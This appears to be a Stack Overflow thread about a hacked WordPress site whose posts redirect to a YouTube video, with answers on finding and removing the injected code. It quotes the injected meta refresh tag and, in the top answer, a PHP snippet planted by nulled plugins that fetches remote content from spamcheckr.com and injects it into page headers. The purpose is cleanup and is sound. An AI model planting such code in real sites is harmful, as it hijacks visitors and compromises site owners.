# Wordpress website posts getting redirected to a Youtube Video

Tags: tags, wordpress, meta

I am facing a major problem on my wordpress website. Someone has hacked and inserted this meta tag somewhere (given below)

```
<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">
```

Due to this code my website posts are getting redirected to a Justin Bieber's youtube video. Now i am not able to find where is this code located and how to delete it.

Any help in this issue will be appreciated.

Comment: Try download a copy of your theme and use a program like notepadd++ to  search through all those files for that link and remove it.

Comment: You could try using a find and replace plugin to replace all instances of that link with a blank string " ".  http://wordpress.org/plugins/search-and-replace/

Comment: If your site's been hacked, removing that code's still going to leave you vulnerable to a return visit from the hacker.  Check out http://codex.wordpress.org/FAQ_My_site_was_hacked

Comment: Check this thread.

http://stackoverflow.com/questions/22923521/wordpress-blog-infected-with-html-refresh-meta-tag

I also have the same issue ;)

Comment: Search in the `header.php` file, maybe is there. Or you can download your theme and search and replace the `<meta>` like @Howlin say.

Answer (score 3):

You can check your folders by using a useful little command in the terminal if you have **grep** (default on macs and many others but not pc). For pc use **findstr** or download grep. If you don't have access to these files locally either download them or access them remotely with **ssh/telnes**

The grep command I use is:

```
grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content
```

(Don't forget to change /www/mysite/wp-content to the location of your wordpress site)

Using `-nr` options with grep it will output the exact line of the folder and file the code is on.

And for pc:

```
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
```

Unfortunately it will probalby tell you it's on line one, but when you open the file you'll notice its a compressed file that is about 250 lines long. No problem though. Just open it with any text editor that has syntax highlighting turned on and look for this code:

```
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
```

It will be the only code that shows up highlighted while all other code will remain greyed out because it's only there to trick you and doesn't actually do anything. You can then delete that code.

You might also want to check on who added the file in the first place so just use the same grep command that you used above but instead use the name of the file that you found the malicious code in. So if the file name is includes/settings.php run the following in the command line:

```
grep -nr 'includes/settings.php' /www/mysite/wp-content
```

Most likely the file was included in the main php script in the plugin root or theme functions.php.

It will look something like this

include 'includes/settings.php';

You're safe to delete that line, if the file was all garbage code. I'd also look through that page to see if anything else was added that looks suspicious.

You're safest bet would be to discontinue from using the plugin entirely, but if you really need it you could run through some online virus checkers or just look through the plugin to be extra safe.

Most often these plugins come from sites like wplocker/themeok.org or other sites that claim they have premium plugins for free. Bottom line is, it's too good to be true and they want to rip you off so either pay for them or be ready for them to screw with you.

By the way it probably did other things beside that so I'd take several other security measures then just fixing the youtube hack.

Answer (score 1):

I found the solution, check your site and all files for the small code "http://spamcheckr.com/l.php" and remove it.

Source: [Removed wordpress error](http://www.fundaclear.com/wordpress-blog-infected-with-redirect-youtube-video/)